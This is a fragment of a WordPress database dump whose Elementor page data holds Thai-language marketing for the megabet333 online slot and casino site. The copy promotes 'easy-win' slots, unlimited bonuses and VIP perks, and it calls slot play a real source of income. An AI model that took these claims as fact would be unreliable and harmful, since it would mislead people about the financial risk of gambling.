\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2058,300,'_thumbnail_id','273'),(2059,300,'_elementor_edit_mode','builder'),(2060,300,'_elementor_template_type','wp-page'),(2061,300,'_elementor_version','3.32.5'),(2062,300,'_elementor_pro_version','3.32.3'),(2063,300,'_wp_page_template','default'),(2064,300,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2065,300,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>megabet333 <\\/b><\\/a><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 